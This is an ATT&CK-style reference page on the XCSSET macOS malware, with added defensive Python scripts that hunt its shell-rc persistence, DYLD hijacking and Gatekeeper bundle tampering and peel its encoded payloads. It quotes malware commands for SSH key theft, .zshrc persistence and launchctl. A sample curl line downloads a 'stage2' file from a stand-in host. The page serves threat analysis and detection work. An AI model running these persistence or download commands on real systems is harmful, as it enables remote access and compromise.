XCSSET

XCSSET is a modular macOS malware family delivered through infected Xcode projects and executed when the project is compiled. Active since August 2020, it has been observed installing backdoors, spoofed browsers, collecting data, and encrypting user files. It is composed of SHC-compiled shell scripts and run-only AppleScripts, often hiding in apps that mimic system tools (such as Xcode, Mail, or Notes) or use familiar icons (like Launchpad) to avoid detection.(Citation: trendmicro xcsset xcode project 2020)(Citation: April 2021 TrendMicro XCSSET)(Citation: Microsoft March 2025 XCSSET)
ID: S0658
Associated Software: OSX.DubRobber
Type: MALWARE
Platforms: macOS
Version: 1.3
Created: 05 Oct 2021
Last Modified: 04 Apr 2025

Associated Software Descriptions

Name Description
OSX.DubRobber (Citation: malwarebyteslabs xcsset dubrobber)

Techniques Used

Domain ID Name Use
Enterprise T1548 .006 Abuse Elevation Control Mechanism: TCC Manipulation

For several modules, XCSSET attempts to access or list the contents of user folders such as Desktop, Downloads, and Documents. If the folder does not exist or access is denied, it enters a loop where it resets the TCC database and retries access.(Citation: Microsoft March 2025 XCSSET)

Enterprise T1098 .004 Account Manipulation: SSH Authorized Keys

XCSSET creates an SSH key pair if one is not already present, using the ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P command, and then uploads the private key file to its server so that the host can be accessed remotely without a password.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

XCSSET uses a shell script to execute Mach-O files and osacompile commands such as osacompile -x -o xcode.app main.applescript.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1543 .004 Create or Modify System Process: Launch Daemon

XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

XCSSET uses RC4 encryption over TCP to communicate with its C2 server.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1546 .004 Event Triggered Execution: Unix Shell Configuration Modification

Using AppleScript, XCSSET adds its executable (the `payload` path) to the user's `~/.zshrc_aliases` file (`"echo " & payload & " > ~/zshrc_aliases"`), then adds a line to `.zshrc` that sources `.zshrc_aliases` (`[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases`). Each time the user starts a new interactive `zsh` session, `.zshrc` sources `.zshrc_aliases` and the payload runs.(Citation: Microsoft March 2025 XCSSET)
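The persistence described above can be hunted for offline by parsing a user's .zshrc and every file it sources. The Python below is an added example written for this page; it is not code from the Microsoft report or from XCSSET. The sample .zshrc and .zshrc_aliases contents are constructed, and the payload path inside them is invented to stand in for whatever path the malware writes. It generalises beyond the single `.zshrc_aliases` case: any file sourced from the rc file is inspected for lines that are not alias, export or variable definitions and would therefore execute on every new shell.

```python
import re

# Matches lines that source another file, including the guarded form XCSSET
# writes into .zshrc:  [ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases
SOURCE_LINE = re.compile(
    r'^\s*(?:\[\s*-f\s+\S+\s*\]\s*&&\s*)?(?:\.|source)\s+(\S+)'
)

# Line starts that are normal in a file called "*aliases": definitions, not commands.
DEFINITION_PREFIXES = ('alias ', 'export ', 'function ', 'setopt ', 'unalias ')

def sourced_files(rc_text):
    """Return every path that an rc file sources with `.` or `source`."""
    hits = []
    for line in rc_text.splitlines():
        m = SOURCE_LINE.match(line)
        if m:
            hits.append(m.group(1))
    return hits

def bare_commands(aliases_text):
    """Return lines of a sourced file that are neither blank, comments, nor
    definitions, i.e. commands that run on every new interactive shell."""
    found = []
    for line in aliases_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        if stripped.startswith(DEFINITION_PREFIXES):
            continue
        if re.match(r'^[A-Za-z_][A-Za-z0-9_]*=', stripped):   # VAR=value
            continue
        found.append(stripped)
    return found

def triage(rc_text, sourced_contents):
    """Map each sourced file to the bare commands it would execute.
    sourced_contents: dict path -> file text (read from disk in real use)."""
    report = {}
    for path in sourced_files(rc_text):
        text = sourced_contents.get(path)
        if text is None:
            continue          # file absent: nothing runs (yet)
        cmds = bare_commands(text)
        if cmds:
            report[path] = cmds
    return report

# Constructed sample inputs; the payload path is invented for illustration.
SAMPLE_ZSHRC = """export PATH=$HOME/bin:$PATH
alias ll='ls -la'
source $HOME/.oh-my-zsh/oh-my-zsh.sh
[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases
"""
SAMPLE_ALIASES = """alias gs='git status'
# harmless comment
/Users/dev/Library/Caches/GeoServices/.xcassets/payload
"""

if __name__ == '__main__':
    print(triage(SAMPLE_ZSHRC, {'$HOME/.zshrc_aliases': SAMPLE_ALIASES}))
```

On a real host, expand `$HOME` before reading the sourced files, and run the same triage over .zprofile, .zshenv and .bash_profile, which the same technique can target.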

Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

XCSSET uses the chmod +x command to grant executable permissions to the malicious file.(Citation: 20 macOS Common Tools and Techniques)

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

XCSSET uses hidden folders named .xcassets and .git to embed itself in Xcode projects.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1574 .006 Hijack Execution Flow: Dynamic Linker Hijacking

XCSSET adds malicious file paths to the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables to execute malicious code.(Citation: trendmicro xcsset xcode project 2020)
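A launchd job that sets DYLD_FRAMEWORK_PATH or DYLD_LIBRARY_PATH is one place this hijack leaves a durable trace. The Python below is an added example for this page, not code from the cited report; the two property lists are constructed, and the labels and paths in them are hypothetical. It parses LaunchAgent/LaunchDaemon plists with plistlib and reports each DYLD_* search path a job injects.

```python
import plistlib

# Environment variables through which dyld can be pointed at attacker code.
DYLD_VARS = ('DYLD_FRAMEWORK_PATH', 'DYLD_LIBRARY_PATH', 'DYLD_INSERT_LIBRARIES')

def dyld_overrides(plist_bytes):
    """Return (variable, path) pairs for every DYLD_* search path that a
    launchd job sets in EnvironmentVariables; colon-separated lists are split."""
    job = plistlib.loads(plist_bytes)
    env = job.get('EnvironmentVariables') or {}
    hits = []
    for var in DYLD_VARS:
        value = env.get(var, '')
        for path in value.split(':'):
            if path:
                hits.append((var, path))
    return hits

def scan(jobs):
    """jobs: mapping of file name -> plist bytes. Returns only the jobs that
    inject dyld search paths, keyed by the job's Label when it has one."""
    findings = {}
    for name, data in jobs.items():
        hits = dyld_overrides(data)
        if hits:
            label = plistlib.loads(data).get('Label', name)
            findings[label] = hits
    return findings

# Constructed samples (hypothetical labels and paths): a benign agent and
# one that plants dyld search paths.
CLEAN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/updater</string></array>
  <key>EnvironmentVariables</key><dict>
    <key>PATH</key><string>/usr/bin:/bin</string>
  </dict>
</dict></plist>
"""
DIRTY_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array><string>/Applications/Xcode.app/Contents/MacOS/Xcode</string></array>
  <key>RunAtLoad</key><true/>
  <key>EnvironmentVariables</key><dict>
    <key>DYLD_FRAMEWORK_PATH</key><string>/Users/dev/Library/Caches/.fw</string>
    <key>DYLD_LIBRARY_PATH</key><string>/Users/dev/Library/Caches/.fw:/usr/lib</string>
  </dict>
</dict></plist>
"""

if __name__ == '__main__':
    print(scan({'clean.plist': CLEAN_PLIST, 'dirty.plist': DIRTY_PLIST}))
```

On a live host, feed it the files under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons. One caveat: with System Integrity Protection enabled, dyld ignores these variables for SIP-protected and hardened-runtime binaries, so the variables only bite for unrestricted processes; that is one reason the malware checks csrutil status (see Security Software Discovery below).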

Enterprise T1056 .002 Input Capture: GUI Input Capture

XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Older XCSSET variants use `xxd` to encode modules. Later versions pass an `xxd` or `base64` encoded blob through multiple decoding stages to reconstruct the module name, AppleScript, or shell command. For example, the initial network request uses three layers of hex decoding before executing a curl command in a shell.(Citation: Microsoft March 2025 XCSSET)
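Unwinding those stages by hand is tedious. The Python below is an added example written for this page, not Microsoft's or the malware's code; it peels nested hex (xxd -p style) and base64 layers until the result no longer decodes to printable text. The sample blobs are constructed from an invented curl command against the reserved example.invalid domain: the three-layer hex case mirrors the pattern described above, and the mixed case shows the same routine handling a base64 wrapper around a hex layer.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable)

def _is_text(data):
    """True when data is entirely printable ASCII (a command, script or name)."""
    try:
        return all(c in PRINTABLE for c in data.decode('ascii'))
    except UnicodeDecodeError:
        return False

def _unhex(data):
    try:
        return binascii.unhexlify(data.strip())
    except (binascii.Error, ValueError):
        return None

def _unb64(data):
    try:
        return base64.b64decode(data.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None

def peel(blob, max_layers=16):
    """Strip nested hex and base64 layers from a bytes blob.

    Returns (layers, payload): the decodings applied, outermost first, and the
    innermost bytes that no longer decode to clean text. Hex is tried before
    base64 because every hex string is also base64-shaped; a layer only counts
    when the decoded result is non-empty printable text."""
    layers, cur = [], blob
    for _ in range(max_layers):
        for name, fn in (('hex', _unhex), ('base64', _unb64)):
            out = fn(cur)
            if out and _is_text(out):
                layers.append(name)
                cur = out
                break
        else:
            break            # neither decoder produced text: we are at the bottom
    return layers, cur

def _hex(data):
    return binascii.hexlify(data)

# Constructed samples; the command and domain are invented for illustration.
SAMPLE_COMMAND = b'curl -s -o /tmp/.report https://example.invalid/stage2'
SAMPLE_TRIPLE_HEX = _hex(_hex(_hex(SAMPLE_COMMAND)))      # the three-layer pattern
SAMPLE_MIXED = base64.b64encode(_hex(SAMPLE_COMMAND))     # base64 around one hex layer

if __name__ == '__main__':
    print(peel(SAMPLE_TRIPLE_HEX))
    print(peel(SAMPLE_MIXED))
```

When triaging a real module, call peel() on the blob pulled from the script and review the returned command before anything else; the layer list tells you which variant's decoding chain you are looking at.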

Enterprise T1518 .001 Software Discovery: Security Software Discovery

XCSSET searches firewall configuration files located in /Library/Preferences/ and uses csrutil status to determine if System Integrity Protection is enabled.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1553 .001 Subvert Trust Controls: Gatekeeper Bypass

XCSSET has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).(Citation: Application Bundle Manipulation Brandon Dalton)
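One offline triage for the bundle manipulation above is to compare Contents/MacOS against the CFBundleExecutable declared in Info.plist. The Python below is an added example for this page, not code from the cited research; build_sample_bundle constructs a throwaway Sample.app with an invented identifier, and the bytes it writes are only the Mach-O magic as a stand-in for real binaries. On macOS the authoritative check is codesign --verify --deep --strict on the bundle, which this heuristic does not replace: some legitimate apps ship helper binaries in Contents/MacOS, so an extra executable is a lead, not a verdict.

```python
import os
import plistlib
import tempfile

def unexpected_executables(bundle_path):
    """List executable files in Contents/MacOS other than the CFBundleExecutable
    declared in Info.plist. Names are returned sorted for stable output."""
    contents = os.path.join(bundle_path, 'Contents')
    with open(os.path.join(contents, 'Info.plist'), 'rb') as fh:
        main_exe = plistlib.load(fh).get('CFBundleExecutable')
    macos_dir = os.path.join(contents, 'MacOS')
    extra = []
    for name in sorted(os.listdir(macos_dir)):
        full = os.path.join(macos_dir, name)
        if name != main_exe and os.path.isfile(full) and os.access(full, os.X_OK):
            extra.append(name)
    return extra

def build_sample_bundle(root, with_applet):
    """Constructed stand-in for an already-launched app (invented identifier):
    Info.plist plus its main executable, optionally with a dropped 'applet'."""
    app = os.path.join(root, 'Sample.app')
    macos_dir = os.path.join(app, 'Contents', 'MacOS')
    os.makedirs(macos_dir)
    with open(os.path.join(app, 'Contents', 'Info.plist'), 'wb') as fh:
        plistlib.dump({'CFBundleExecutable': 'Sample',
                       'CFBundleIdentifier': 'com.example.sample'}, fh)
    for name in ['Sample'] + (['applet'] if with_applet else []):
        path = os.path.join(macos_dir, name)
        with open(path, 'wb') as fh:
            fh.write(b'\xcf\xfa\xed\xfe')   # 64-bit Mach-O magic only; a stand-in
        os.chmod(path, 0o755)
    return app

def demo():
    """Build a tampered and an untouched bundle and check both."""
    with tempfile.TemporaryDirectory() as tmp:
        tampered = build_sample_bundle(os.path.join(tmp, 'a'), with_applet=True)
        untouched = build_sample_bundle(os.path.join(tmp, 'b'), with_applet=False)
        return unexpected_executables(tampered), unexpected_executables(untouched)

if __name__ == '__main__':
    print(demo())
```

Run unexpected_executables() over /Applications and ~/Applications and compare the hits against a known-good inventory of the same app versions; an `applet` beside the main executable of an app that normally has none is the pattern described above.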

Enterprise T1195 .001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools

XCSSET adds malicious code to a host's Xcode projects either by enumerating CocoaPods target_integrator.rb files under the /Library/Ruby/Gems folder or by enumerating all .xcodeproj folders under a given directory. XCSSET then downloads a script and a Mach-O file into the Xcode project folder.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1614 .001 System Location Discovery: System Language Discovery

XCSSET uses AppleScript to check the host's language and location with the command user locale of (get system info).(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1569 .001 System Services: Launchctl

XCSSET loads a system-level launch daemon with the launchctl load -w command, using /System/Library/LaunchDaemons/ssh.plist.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1497 .003 Virtualization/Sandbox Evasion: Time Based Evasion

Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, .report. After the elapsed time, XCSSET executes additional modules.(Citation: trendmicro xcsset xcode project 2020)
